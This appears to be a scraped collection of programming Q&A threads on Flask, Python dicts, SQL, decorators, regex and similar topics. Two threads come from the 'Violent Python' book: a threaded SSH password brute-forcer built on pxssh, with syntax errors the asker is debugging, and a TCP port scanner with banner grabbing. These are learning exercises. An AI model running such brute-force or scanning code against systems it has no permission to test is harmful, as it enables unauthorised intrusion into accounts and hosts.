SQLALCHEMY_DATABASE_URI = "sqlite://"
TESTING = True
def create_app(self):
# pass in test configuration
return create_app(self)
def setUp(self):
db.create_all()
def tearDown(self):
db.session.remove()
db.drop_all()
``` | This is the way I've been running unit tests recently. I'm assuming since you are using SQLAlchemy that you're using model classes. I'm also assuming that all of your tables are defined as SQLAlchemy model classes.
```
from flask import Flask
import unittest
from app import db
from app.models import Log
from constants import test_logs
class appDBTests(unittest.TestCase):
def setUp(self):
"""
Creates a new database for the unit test to use
"""
self.app = Flask(__name__)
db.init_app(self.app)
with self.app.app_context():
db.create_all()
self.populate_db() # Your function that adds test data.
def tearDown(self):
"""
Ensures that the database is emptied for next unit test
"""
self.app = Flask(__name__)
db.init_app(self.app)
with self.app.app_context():
db.drop_all()
```
Since you're using the same DB set up as your app this allows you to build and destroy a test database with every unit test you run. | How can I test a Flask application which uses SQLAlchemy? | [
"",
"python",
"session",
"testing",
"flask",
"sqlalchemy",
""
] |
Alright, let's say I have these two dictionaries:
```
A = {(3,'x'):-2, (6,'y'):3, (8, 'b'):9}
B = {(3,'y'):4, (6,'y'):6}
```
I am trying to add them together such that I get a dict similar to this:
```
C = {(3,'x'):-2,(3,'y'):4, (6,'y'):9, (8, 'b'):9}
```
I have tried making a comprehension that does this for dicts of any length, but it seems a bit difficult for a newbie. I am at a level where I try stuff like this, for example:
Edited:
```
>>> {k:A[k]+B[d] for k in A for d in B}
{(6, 'y'): 7, (3, 'x'): 2, (8, 'b'): 13}
```
I got this far thanks to some help, but it leaves out the
`(3,'y'): 4` for some reason. | Since you're using Python 3, one possible approach would be:
```
>>> A = {(3,'x'):-2, (6,'y'):3, (8, 'b'):9}
>>> B = {(3,'y'):4, (6,'y'):6}
>>> {k: A.get(k,0) + B.get(k,0) for k in A.keys() | B.keys()}
{(8, 'b'): 9, (3, 'x'): -2, (6, 'y'): 9, (3, 'y'): 4}
```
In Python 3, `.keys()` returns a `dict_keys` object, and we can use the `|` operator to take the union of the two. (That's why `A.keys() + B.keys()` won't work.)
(I'd probably use a `Counter` myself, FWIW.) | I would use a [collections.Counter](http://docs.python.org/2/library/collections.html#collections.Counter) for this:
```
>>> A = {(3,'x'):-2, (6,'y'):3, (8, 'b'):9}
>>> B = {(3,'y'):4, (6,'y'):6}
>>> import collections
>>> C = collections.Counter(A)
>>> C.update(B)
>>> dict(C)
{(3, 'y'): 4, (8, 'b'): 9, (3, 'x'): -2, (6, 'y'): 9}
``` | Python: adding two dicts together | [
"",
"python",
""
] |
I'm trying to query some data, and one of the columns is in datetime format. I want it to show `dd/mm/yy` with no time on it, directly from the SELECT. Is this possible?
This is my query; `join_date` is the datetime that I need changed to a short date:
```
$query = mysql_query("SELECT id,username,join_date,is_active FROM members",$con)
or trigger_error(mysql_error());
```
This query goes directly into a JSON output array, so I want to convert it directly from the query. | Use the MySQL [`DATE_FORMAT` function](http://dev.mysql.com/doc/refman/5.1/en/date-and-time-functions.html#function_date-format) for this:
```
SELECT id, username, DATE_FORMAT(join_date, '%d/%m/%y') AS join_formatted, is_active
FROM members
```
In this example, the column name for the formatted date will be `join_formatted`, and its type will be `VARCHAR`.
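If you ever need the same formatting on the application side instead of in SQL, the same specifiers map directly onto `strftime` (illustrative Python; the sample date is made up):

```python
from datetime import datetime

join_date = datetime(2013, 7, 25, 14, 30)  # stand-in for a fetched DB value
print(join_date.strftime("%d/%m/%y"))  # -> 25/07/13
print(join_date.strftime("%d/%m/%Y"))  # -> 25/07/2013
```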
The format string returns the date as `dd/mm/yy` as requested, but I'm personally more comfortable when the date includes the full century. To get the full century, use uppercase `Y` in the format string: `%d/%m/%Y`. | try this :
```
"SELECT id, username, DATE_FORMAT(join_date,'%d/%m/%y'), is_active FROM members"
``` | Change datatime to date dd/mm/yy | [
"",
"mysql",
"sql",
""
] |
I am trying to create a simple calculator that accepts arguments at the command line. For example, at the command line:
```
Calculator.py 1 2 44 6 -add
```
will give me the sum of the numbers. However, how can the user input an infinite number of arguments? I know you have to use \*args or something like that in functions, and I just wanted to know how to incorporate that in the command line using argparse. | ```
import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
args = parser.parse_args()
print args.accumulate(args.integers)
```
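Adapted to the calculator in the question, a minimal sketch (note that argparse conventions favor `--add` over `-add`; the list passed to `parse_args` stands in for the real command line):

```python
import argparse

parser = argparse.ArgumentParser(description="Tiny calculator")
parser.add_argument("numbers", metavar="N", type=int, nargs="+",
                    help="numbers to operate on")
parser.add_argument("--add", dest="op", action="store_const",
                    const=sum, default=max,
                    help="sum the numbers (default: find the max)")

args = parser.parse_args(["--add", "1", "2", "44", "6"])
print(args.op(args.numbers))  # -> 53
```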
<https://docs.python.org/3/library/argparse.html> | You don't need to, command line arguments are stored in [`sys.argv`](http://docs.python.org/2/library/sys.html#sys.argv) which will give you a list of the command line arguments. You just need to sum over them.
```
from sys import argv
print sum(map(int, argv[1:])) # We take a slice from 1: because the 0th argument is the script name.
```
And just do
```
python testScript.py 1 2 3
6
```
**P.S** - Command line arguments are stored as strings, so you need to `map` them to integers to sum over them.
`*args` is used when you need to pass an unknown number of values to a function. Consider the following -
```
>>> def testFunc(*args):
return sum(args)
>>> testFunc(1, 2, 3, 4, 5, 6)
21
``` | Infinite Amount of Command Line Arguments in Python | [
"",
"python",
"argparse",
""
] |
I've been reading on Wikipedia and it seems that NeXT developed an object-relational mapping framework for Objective-C called Enterprise Objects Framework. And then Apple absorbed NeXT and EOF became WebObjects. And then WebObjects became Java.
Is there any part of the EOF or Objective-C based WebObjects lying around? An object-relational mapping framework for Objective-C would be immensely useful to me.
UPDATE: I'm looking for a database agnostic ORM system that can connect to MySQL and SQLite at least, Oracle and PostgreSQL would be nice. I need to be able to update the database separately from the ORM, something CoreData does not allow. | EOF has become CoreData and CoreData doesn't support arbitrary schemas or backing stores. So I made a couple of frameworks that do.
[ORDA](https://github.com/Firelizzard-Inventions/ORDA), the **O**bjective-C **R**elational **D**atabase **A**bstraction framework, is a 'standard' interface for creating Objective-C database drivers. The goal is to build a system for Objective-C that serves the same purpose of the JDBC.
[CORM](https://github.com/Firelizzard-Inventions/CORM), the Objective-**C** **O**bject **R**elational **M**apping framework, leverages Cocoa technologies to provide a powerful, dynamic, and extremely simple to use ORM for Objective-C. It is currently under development. | I'm pretty sure you're looking for [Core Data](http://developer.apple.com/library/mac/#documentation/cocoa/Conceptual/CoreData/cdProgrammingGuide.html).
From [wikipedia](http://en.wikipedia.org/wiki/Core_Data):
> On computer systems running Mac OS X and mobile devices running iOS,
> Core Data is an object graph and persistence framework provided by
> Apple. It was introduced in Mac OS X 10.4 Tiger and iOS with iPhone
> SDK 3.0. It allows data organised by the relational
> entity–attribute model to be serialised into XML, binary, or SQLite
> stores. The data can be manipulated using higher level objects
> representing entities and their relationships. Core Data manages the
> serialised version, providing object lifecycle and object graph
> management, including persistence. Core Data interfaces directly with
> SQLite, insulating the developer from the underlying SQL. | Objective-C and SQL? | [
"",
"sql",
"objective-c",
"webobjects",
""
] |
I am trying to write a query to count the number of records based on a number of different ranges.
I have success with using `union`, but I feel there is a better way to do it.
Here is what I've done:
```
select count(col1) as range1
from tbl1
where col1 <= 15000
union
select count(col1) as range2
from tbl1
where col1 > 15001 and col1 <= 30000
union
select count(col1) as range3
from tbl1
where col1 > 30001 and col1 <= 45000
etc...
```
I am using sql server 2008. Like I stated above, I'm positive there is a better way to do this, maybe something like this: [sql count](https://stackoverflow.com/questions/17577155/counting-occurences-within-a-range-of-my-table-sql-server-2012),
EDIT: Yes, the database is sql 2008, and the answers below work exactly as needed. I forgot to mention that I'm actually reading a `JSON` file that has been `serialized` via coldfusion `serializeJSON`. So in the db, everything below worked perfectly, but coldfusion query of queries doesn't support the `CASE` statement, or it doesn't appear to. | One way is with conditional summation (for the values in separate columns):
```
select sum(case when col1 <= 15000 then 1 else 0 end) as range1,
sum(case when col1 > 15001 and col1 <= 30000 then 1 else 0 end) as range2,
sum(case when col1 > 30001 and col1 <= 45000 then 1 else 0 end) as range3
from tbl1;
```
Another way is with `group by` (for the values on separate rows):
```
select (case when col1 <= 15000 then 'range1'
when col1 > 15001 and col1 <= 30000 then 'range2'
when col1 > 30001 and col1 <= 45000 then 'range3'
else 'other'
end) as range, count(*) as cnt
from tbl1
group by (case when col1 <= 15000 then 'range1'
when col1 > 15001 and col1 <= 30000 then 'range2'
when col1 > 30001 and col1 <= 45000 then 'range3'
else 'other'
end);
```
I often use a subquery for this form:
```
select range, count(*)
from (select t.*,
(case when col1 <= 15000 then 'range1'
when col1 > 15001 and col1 <= 30000 then 'range2'
when col1 > 30001 and col1 <= 45000 then 'range3'
else 'other'
end) as range
      from tbl1
     ) t
group by range;
```
That way, the definition of `range` only appears once.
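The conditional-summation form can be sanity-checked with Python's `sqlite3` module (the sample values below are made up for illustration, and the boundaries use `> 15000`/`> 30000` so no value falls into a gap):

```python
import sqlite3

# In-memory table with made-up values: one each in range1/range2, two in range3.
con = sqlite3.connect(':memory:')
con.execute('CREATE TABLE tbl1 (col1 INTEGER)')
con.executemany('INSERT INTO tbl1 VALUES (?)',
                [(100,), (16000,), (32000,), (40000,)])

row = con.execute('''
    SELECT SUM(CASE WHEN col1 <= 15000 THEN 1 ELSE 0 END) AS range1,
           SUM(CASE WHEN col1 > 15000 AND col1 <= 30000 THEN 1 ELSE 0 END) AS range2,
           SUM(CASE WHEN col1 > 30000 AND col1 <= 45000 THEN 1 ELSE 0 END) AS range3
    FROM tbl1''').fetchone()
print(row)  # → (1, 1, 2)
```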
EDIT:
The above all use the logic from the OP. However, the above logic misses the values of `15001` and `30001`. My guess is that the OP really means `col1 > 15000 and col1 <= 30000` and `col1 > 30000 and col1 <= 45000` for the conditions. But, I'm not changing them because the above is how the original question is phrased (perhaps there is something special about `15001` and `30001`). | Personally I prefer using a derived (or physical) table to store my range boundaries which I then join back to in order to find my results.
I reckon the code is simpler and easier to extend if required
Something a little like this:
```
; WITH ranges (lbound, ubound) AS (
SELECT 0, 1500
UNION ALL SELECT 1500, 3000
UNION ALL SELECT 3000, 4500
)
SELECT ranges.lbound
, ranges.ubound
, Count(your_table.value) As turtle
FROM ranges
LEFT
JOIN your_table
ON your_table.value >= ranges.lbound
AND your_table.value < ranges.ubound
GROUP
BY ranges.lbound
, ranges.ubound
``` | Counting number of records for specific ranges sql server | [
"",
"sql",
"sql-server",
"coldfusion",
""
] |
given a dictionary of lists
```
vd = {'A': [1,0,1], 'B':[-1,0,1], 'C':[0,1,1]}
```
I want to add the lists element-wise. So I want to add the first element of list A to the first element of list B, and so on.
The complexity is that you cannot rely on the labels being A, B, C; they can be anything. Second, the length of the dictionary is also variable: here it is 3, but it could be 30.
The result I need is the list [0, 1, 3]. | In short:
```
>>> map(sum, zip(*vd.values()))
[0, 1, 3]
```
---
# Explanation
Given a dictionary:
```
>>> vd = {'A': [1,0,1], 'B': [-1,0,1], 'C': [0,1,1]}
```
We can [get the values](http://docs.python.org/2/library/stdtypes.html#dict.values):
```
>>> values = vd.values()
>>> values
[[1, 0, 1], [-1, 0, 1], [0, 1, 1]]
```
Then [zip](http://docs.python.org/2/library/functions.html#zip) them up:
```
>>> zipped = zip(*values)
>>> zipped
[(1, -1, 0), (0, 0, 1), (1, 1, 1)]
```
Note that `zip` zips up each argument; it doesn't take a list of things to zip up. Therefore, we need the `*` to unpack the list into arguments.
If we had just one list, we could [sum](http://docs.python.org/2/library/functions.html#sum) them:
```
>>> sum([1, 2, 3])
6
```
However, we have multiple, so we can [map](http://docs.python.org/2/library/functions.html#map) over it:
```
>>> map(sum, zipped)
[0, 1, 3]
```
All together:
```
>>> map(sum, zip(*vd.values()))
[0, 1, 3]
```
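A side note, not part of the original answer: in Python 3, `map` returns a lazy iterator rather than a list, so wrap the result in `list()` to get the same output:

```python
vd = {'A': [1, 0, 1], 'B': [-1, 0, 1], 'C': [0, 1, 1]}

# Python 3: map() is lazy, so materialise the result with list().
result = list(map(sum, zip(*vd.values())))
print(result)  # → [0, 1, 3]
```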
---
# Extending to an average rather than a sum
This approach is also easily extensible; for example, we could quite easily make it average the elements rather than sum them. To do that, we'd first make an `average` function:
```
def average(numbers):
# We have to do the float(...) so it doesn't do an integer division.
# In Python 3, it is not necessary.
return sum(numbers) / float(len(numbers))
```
Then just replace `sum` with `average`:
```
>>> map(average, zip(*vd.values()))
[0.0, 0.3333, 1.0]
``` | So you just want to add up all the values elementwise?
`[sum(l) for l in zip(*vd.values())]` | How to add elements from a dictonary of lists in python | [
"",
"python",
""
] |
Is there a way to pass a variable between two Python decorators applied to the same function? The goal is for one of the decorators to know that the other was also applied. I need something like decobar\_present() from the example below:
```
def decobar(f):
def wrap():
return f() + "bar"
return wrap
def decofu(f):
def wrap():
print decobar_present() # Tells me whether decobar was also applied
return f() + "fu"
return wrap
@decofu
@decobar
def important_task():
return "abc"
```
More generally I would like to be able to modify the behavior of decofu depending on whether decobar was also applied. | You can add the function to a "registry" when `decobar` is applied to it, then later check the registry to determine whether `decobar` was applied to the function or not. This approach requires preserving original function's `__module__` and `__name__` properties intact (use `functools.wraps` over the wrapper function for that).
```
import functools
class decobar(object):
registry = set()
@classmethod
def _func_key(cls, f):
return '.'.join((f.__module__, f.func_name))
@classmethod
def present(cls, f):
return cls._func_key(f) in cls.registry
def __call__(self, f):
self.registry.add(self._func_key(f))
@functools.wraps(f)
def wrap():
return f() + "bar"
return wrap
# Make the decorator singleton
decobar = decobar()
def decofu(f):
@functools.wraps(f)
def wrap():
print decobar.present(f) # Tells me whether decobar was also applied
return f() + "fu"
return wrap
@decofu
@decobar
def important_task():
return "abc"
```
Used a class to implement `decobar`, as it keeps `registry` and `present()` in a single namespace (which feels slightly cleaner, IMO). | To pass a variable between two Python decorators, you can use the decorated function's keyword arguments dictionary. Just don't forget to pop the added argument from there before calling the function from within the second decorator.
```
def decorator1(func):
def wrap(*args, **kwargs):
kwargs['cat_says'] = 'meow'
return func(*args, **kwargs)
return wrap
def decorator2(func):
def wrap(*args, **kwargs):
print(kwargs.pop('cat_says'))
return func(*args, **kwargs)
return wrap
class C:
@decorator1
@decorator2
def spam(self, a, b, c, d=0):
print("Hello, cat! What's your favourite number?")
return a + b + c + d
x=C()
print(x.spam(1, 2, 3, d=7))
``` | passing variables between two python decorators | [
"",
"python",
"decorator",
"chaining",
""
] |
I have this `select` statement and what I am trying to accomplish is to get data in the
`DosagePerUnits` column only if `Dosage` is not equal to empty or 1 and if `Units` is not empty or 1.
Can someone help me, please?
```
select
sbd.Code, c.Description, sbd.Dosage,
Case
when sbd.Units = '' then '1'
else sbd.Units
end as Units,
ad.ApptDate, sbd.RCycle, sbd.RWeek, sbd.RDay,
    t.HistoryOrder, t.TypeId, sbd.Dosage + '/' + sbd.Units AS DosagePerUnits
from
bill_SuperBillDetail sbd,
bill_ProcedureVerification pv,
AppointmentData ad,
CPTCode c,
CPTType t
where
sbd.AccessionNumber = pv.AccessionNumber
and pv.ApptId = ad.ApptId
and ad.PatientId = 443
and ad.ApptDate <= GETDATE()
and ad.ApptDate > '2009-11-15 00:00:00.000'
and c.TypeId = t.TypeId
``` | According to your description, it should be like this:
```
CASE WHEN ISNULL(sbd.Dosage, '1') <> '1' AND ISNULL(sbd.Units, '1') <> '1' THEN
sbd.Dosage + '/' + sbd.Units
ELSE NULL END AS DosagePerUnits
```
`ISNULL(x, 1)` replaces x with 1 if it is null, so `ISNULL(x, 1)` equals 1 if x is either 1 or NULL.
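The NULL handling can be sandboxed with Python's `sqlite3` (SQLite spells the function `IFNULL`/`COALESCE` rather than `ISNULL`; the test values are made up):

```python
import sqlite3

con = sqlite3.connect(':memory:')
# COALESCE(x, '1') <> '1' is true only when x is present and not '1',
# mirroring the ISNULL-based guard above.
flags = [con.execute("SELECT COALESCE(?, '1') <> '1'", (v,)).fetchone()[0]
         for v in (None, '1', '250')]
print(flags)  # → [0, 0, 1]
```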
EDIT:
Changed to the assumption that [Dosage] and [Unit] are both *varchar* as your comment indicates. | instead of
Case when sbd.Units = '' then '1' else sbd.Units end as Units,
try
Coalesce(sbd.Units,1) as Units, | CASE statement IF ELSE in SQL Server | [
"",
"sql",
"sql-server",
"t-sql",
""
] |
I'm using the [mutagen](https://code.google.com/p/mutagen/) module for Python to get the artist of various MP3 files I have.
Here's the code giving the error:
```
from mutagen.easyid3 import EasyID3

audio = EasyID3(r"C:\Users\Owner\Music\Music\Blue Öyster Cult\Blue Öyster Cult\Cities on Flame")
print audio["artist"]
```
The code is working for most of my MP3 files, but there are a select few that continually give the following error:
> KeyError: 'TPE1'
And because of that error, I can't see the artist. Note that these MP3 files all have an artist, and none of them have special characters or anything like that.
Why is this happening? And how can I fix it?
Thanks | Most likely, you're looking for a key which doesn't exist in mutagens id3 dictionary. Do a simple check like you would do for a regular dictionary:
```
if 'artist' in audio:
print audio['artist']
```
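The same membership idea works with `.get` and a default; here a plain dict stands in for the tag mapping (a sketch, not mutagen-specific API guidance):

```python
# Plain dict playing the role of the ID3 tag mapping; 'artist' is absent,
# as in the files that raised KeyError: 'TPE1'.
tags = {'title': ['Cities on Flame']}

artist = tags.get('artist', ['Unknown artist'])
print(artist[0])  # → Unknown artist
```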
I've tried with and without ensuring that the argument is Unicode and it works in both cases with `Python 2.7.3` | This is probably because you removed its value manually via the file properties/details.
That's what happened to me (with Python 3.4).
You could redefine the key as follows:
```
if 'keyname' not in Dic:
    Dic['keyname'] = ""
```
If that was the reason it should work again. | What is the "TPE1" KeyError? | [
"",
"python",
"mp3",
"id3",
"mutagen",
""
] |
I'm trying to figure out the best way to design a database to support private user-defined groups. Pretty much identical to how Google Circles are. These are to be for **JUST** the user, much like circles are - that's why creating a user group design like I found here: <https://stackoverflow.com/a/9805712/2580503> would be undesirable.
So far the only solution I can come up with is to have a table like this:
> USER\_ID | GROUP\_ID | ARRAY(USER\_ID)
Where the PKEY would actually be a compound key of (USER\_ID, GROUP\_ID). This way a user could have multiple groups.
Would greatly appreciate any feedback on this proposed solution and would love to hear if there is a better way to do it.
Thanks!
**Edit:** Just to clarify, GROUP\_ID would not reference a separate table, it would just indicate the number group for that user. Also there would be a name etc. for the group as well - just wasn't necessary to include as part of the question. | This must involve at least three (3) tables if you want a normalized design. USERS, USER\_GROUPS, and USER\_GROUPS\_MEMBERS. You are correct that the PK of USER\_GROUPS would be a dyad (USER, GROUP). The PK of USER\_GROUPS\_MEMBERS would be a triad (USER, GROUP, USER). | What about?
```
Groups (GROUP_ID, USER_ID, GROUP_NAME)
Members (MEMBER_ID, GROUP_ID, USER_ID)
```
Although `Groups` might appear backwards, it actually lists the `USER_ID` that owns a `GROUP_ID` while `Members` gives the `MEMBER_ID` to which could be associated rows that have to do with this `USER_ID` in the given `GROUP_ID`. | Database Design for user defined groups | [
"",
"sql",
"database",
"database-design",
""
] |
Okay, so I'm using the Violent Python book and made an SSH brute-force program. When I run the following code:
```
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxconnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+} Paassword Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect9host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog '+\
'-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgtHost', type='string', \
help= 'specify target host')
parser.add_option('-u', dest='user', type='string', \
help='specify the user')
parser.add_option('-F', dest='psswdFile', type='string, \
help='specify password file')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.psswdFile
user = options.user
if host == None or psswdFile == None or user == None:
print parser.usage
exit(0)
fn = open(psswdFile, 'r')
for line in fn.readlines():
if Found:
print "[+] Exting: Password Found."
exit(0)
if Fails > 5
print "[!] Exiting: Too many socket timeouts"
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Thread(target=connect, args+(host, user, \
password, True))
child = t.start()
if __name__ == '__main__':
main()
```
and run it on terminal using the following command:
```
python brute_force_ssh_pxssh.py -H 10.10.1.36 -u root -F pass.txt
```
I get this error:
```
File "brute_force_ssh_pxssh.py", line 17
Found = True
^
SyntaxError: invalid syntax
```
I checked the sample code and it is written exactly like this... Any help is greatly appreciated. (I am still a noob in Python.) Thanks! | You have some problems with indentation in various parts of the code.
Other than line 17, it looks like you have an indentation problem on
line 20, line 23 (the elif block), line 27, and line 38, and lines 48 to 59 seem to be badly indented.
Also you have a missing ' on line 34 and an extra ) on line 25 | The indentation is wrong. Should be
```
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+} Paassword Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
``` | Syntax Error which I can't seem to find | [
"",
"python",
""
] |
I have a table with three fields: `ID`, `date` and `action`. The three possible values of `action` are `X`, `Y` and `Z`. I want a query which, for each `ID` in the table for which there ia a row with a `Z` action, will return the most recent row for the same `ID` with an `X` action, if one exists.
Here is what I want to do in MySQL. I copy-and-pasted the code from [sqlfiddle.com](http://sqlfiddle.com), so I know it works.
```
create table a (id int,
date int,
action varchar(1));
insert into a values(1, 1, 'X');
insert into a values(1, 2, 'X');
insert into a values(1, 3, 'Z');
insert into a values(2, 1, 'X');
insert into a values(2, 2, 'Y');
insert into a values(2, 3, 'Y');
insert into a values(2, 4, 'Z');
insert into a values(3, 1, 'X');
insert into a values(3, 2, 'Y');
insert into a values(3, 3, 'X');
insert into a values(3, 4, 'Z');
insert into a values(4, 3, 'X');
SELECT a.id,
max(a.date) as Xdate,
b.date as Zdate,
a.action FROM a,
(SELECT * FROM a WHERE a.action = 'Z') b
WHERE
a.date < b.date AND
a.ID = b.ID AND
a.action = 'X'
GROUP BY a.id;
```
I can't use the `GROUP BY` clause with other fields like this in Oracle, so I did a nested subquery which found the maximum date for each ID separately, but it is very slow (I am expecting to get about 10^5 rows) and I was hoping that there was a better way to do it which would be faster. (I can't post my actual Oracle query at the moment because it does not run in SQLfiddle; it keeps complaining about rows being ambiguously defined.)
Can the above query be made to work in Oracle somehow? If not, is there an equivalent way to do it which will run in a reasonable time? | This works (although it may be able to be simplified):
```
SELECT a.id,
max(a."date") as Xdate,
b."date" as Zdate,
a.action
FROM a INNER JOIN
(SELECT *
FROM a
WHERE a.action = 'Z') b
ON a.ID = b.ID
WHERE a."date" < b."date"
AND a.action = 'X'
GROUP BY a.id, b."date", a.action
```
* [SQL Fiddle Demo](http://sqlfiddle.com/#!4/cd704/1)
Please note, you need to use `"` around reserved words -- in this case the column `date`. You also need to add all of your fields to the `GROUP BY` clause. MySQL allows it without, but Oracle does not.
---
Edit, simplified version:
```
SELECT a.Id, max(a."date"), b."date", a.action
FROM a
INNER JOIN a b ON a.Id = b.Id AND b.action = 'Z'
WHERE a.action = 'X'
AND a."date" < b."date"
GROUP BY a.Id, b."date", a.action
```
* [Updated Fiddle](http://sqlfiddle.com/#!4/cd704/3) | Here other solution:
```
WITH temp AS (
SELECT a.id, a.date_f, a.action FROM a WHERE a.action = 'Z'
)
SELECT a.id,
max(a.date_f) as Xdate,
temp.date_f as Zdate,
a.action
FROM a
INNER JOIN temp ON temp.id = a.id AND a.date_f < temp.date_f
WHERE a.action = 'X'
GROUP BY a.id,temp.date_f,a.action;
```
**Note**: date\_f is the field date.
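Either query can be exercised against the question's data with Python's `sqlite3` (SQLite shown here, not Oracle; the `date` column is quoted the same way, and an `ORDER BY` is added so the output order is deterministic):

```python
import sqlite3

con = sqlite3.connect(':memory:')
con.execute('CREATE TABLE a (id INTEGER, "date" INTEGER, action TEXT)')
con.executemany('INSERT INTO a VALUES (?, ?, ?)',
                [(1, 1, 'X'), (1, 2, 'X'), (1, 3, 'Z'),
                 (2, 1, 'X'), (2, 2, 'Y'), (2, 3, 'Y'), (2, 4, 'Z'),
                 (3, 1, 'X'), (3, 2, 'Y'), (3, 3, 'X'), (3, 4, 'Z'),
                 (4, 3, 'X')])

rows = con.execute('''
    SELECT a.id, MAX(a."date") AS Xdate, b."date" AS Zdate
    FROM a
    INNER JOIN a b ON a.id = b.id AND b.action = 'Z'
    WHERE a.action = 'X' AND a."date" < b."date"
    GROUP BY a.id, b."date"
    ORDER BY a.id''').fetchall()
print(rows)  # → [(1, 2, 3), (2, 1, 4), (3, 3, 4)]
```

Note that id 4 drops out, since it has an 'X' row but no 'Z' row.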
**[SQL Fiddle Demo](http://sqlfiddle.com/#!4/adc50/10)**. | Nested subquery in Oracle is slow | [
"",
"sql",
"oracle",
""
] |
So I'm learning Python and hacking at the same time from "Violent Python" and I ran into a problem
Here's my code:
```
import optparse
import socket
from socket import *
from threading import *
screenLock = Semaphore(value = 1)
def connScan(tgtHost, tgtPort):
try:
connSkt = socket(AF_INET, SOCK_STREAM)
connSkt.connect((tgtHost, tgtPort))
connSkt.send('ViolentPython\r\n')
results = connSkt.recv(100)
screenLock.acquire()
print '[+]%d/tcp open' %tgtPort
print '[+] ' + str(results)
except:
screenLock.acquire()
print '[-]%d/tcp closed' %tgtPort
finally:
screenLock.release()
connSkt.close()
def portScan(tgtHost, tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
print "[-] Cannot resolve '%s': Unknown host" %tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP)
print '\n[+] Scan Results for ' +tgtName[0]
except:
print '\n[+] Scan Results for ' +tgtIP
setdefaulttimeout(10)
for tgtPort in tgtPorts:
print 'Scanning port ' +tgtPort
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
def main():
parser = optparse.OptionParser('usage %prog ' +\
'-H <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', \
help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', \
help='specify target port[s] seperated by a comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(', ')
if (tgtHost == None) | (tgtPorts[0] == None):
print parser.usage
exit(0)
portScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()
```
Running the program I get the following error message:
```
File "port_scanner.py", line 54, in <module>
main()
File "port_scanner.py", line 52, in main
portScan(tgtHost, tgtPorts)
File "port_scanner.py", line 37, in portScan
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
ValueError: invalid literal for int() with base 10: '21,'
```
Can anyone please help? I'm still new at this but my guess is Python isn't separating the different ports I'm inputting by running this command:
```
python port_scanner.py -H 74.207.244.221 -p 21, 22, 80
```
The ip I'm targeting is scanme.org and is made for scanning. Thanks! | First of all, you are misunderstanding how your command line is being parsed.
You pass in:
```
python port_scanner.py -H 74.207.244.221 -p 21, 22, 80
```
which means that Python sees:
```
['-H', '74.207.244.221', '-p', '21,', '22,', '80']
```
and the `optparse.OptionParser` thus parses *just* `'21,'` as the value for the `-p` switch. As a result, `options.tgtPort` is set to `'21,'`, and `.split(', ')` on that value results in `['21,']` because there is *no* `', '` (comma and space) in that input string.
To include spaces in an argument, use quoting on the command line:
```
python port_scanner.py -H 74.207.244.221 -p "21, 22, 80"
```
but you really want to adjust your command-line parsing to split *just* on commas and tolerate spaces instead:
```
tgtPorts = [p.strip() for p in options.tgtPort.split(',')]
```
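Pulling that together into a small helper (the `parse_ports` function is hypothetical, not part of the original script), which tolerates both the quoted space-separated form and a compact comma-separated one:

```python
def parse_ports(arg):
    # Split on commas only; int() ignores surrounding whitespace, and empty
    # pieces (e.g. from a trailing comma) are skipped.
    return [int(p) for p in arg.split(',') if p.strip()]

print(parse_ports('21,22,80'))    # → [21, 22, 80]
print(parse_ports('21, 22, 80'))  # → [21, 22, 80]
```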
Another thing to understand is that splitting a string using `.split()` will result in a list with *at least* one element:
```
>>> 'foo'.split(',')
['foo']
```
so your test for `tgtPorts[0] == None` will always be `False`. Note that the normal Python idiom is to use `is` for `None` instead (`tgtPorts[0] is None`) because `None` is a singleton. | You have a comma in the value of the port, so Python can't convert the string into integer smoothly. You can reproduce this exception in interpreter easily:
```
>>> int("2,")
Traceback (most recent call last):
File "<pyshell#27>", line 1, in <module>
int("2,")
ValueError: invalid literal for int() with base 10: '2,'
>>> int("2")
2
```
To remove the comma, simply don't pass it in at the command line. Or if you really have to, process the input so that it can be converted. | Violent Python: port inputs not being seperated | [
"",
"python",
""
] |
I am learning regular expressions and trying to do the following:
Below is the format of a series of alphanumeric digits. It starts with 4 digits, followed by 2 spaces, then four groups of 8 digits each separated by a single space, with a single space and a pipe ('|') at the end.
```
FFFF FFFFFFFF FFFFFFFF FFFFFFFF FFFFFFFF |
```
or written more clearly:
```
FFFF[space][space]FFFFFFFF[space]FFFFFFFF[space]FFFFFFFF[space]FFFFFFFF[space]|
```
I first need to find the correct line in a file, which starts with 00A3. Then I need to pull out the 8-digit groups using:
```
p = re.compile('00A3 ') # search for 00A3[space][space]
r = re.compile(???) # search for desired 8 digit groups
q = re.compile(r'\[SECTION2\])'.replace(')', ''))  # search for the literal [SECTION2] marker
dataString = inFile.next() # 00A3 388A63FF 00000DF1 52984731 FF989ACB
while not q.match(dataString):  # look for [SECTION2] line in file. This means we passed where 00A3 would have been, so it must not be here.
if p.match(dataString):
numbers = r.findall(dataString) # numbers = [388A63FF, 00000DF1, 52984731, FF989ACB]
break
dataString = inFile.next() # get next line to check
```
This should give me a list of the numbers for further processing. I'm just not sure how to write the regex that will find only the 4 groups of 8 alphanumeric digits separated by a space. My thought was to look for 8 alphanumeric digits with a space in front and a space behind, but would that cause a problem, and how would that look?
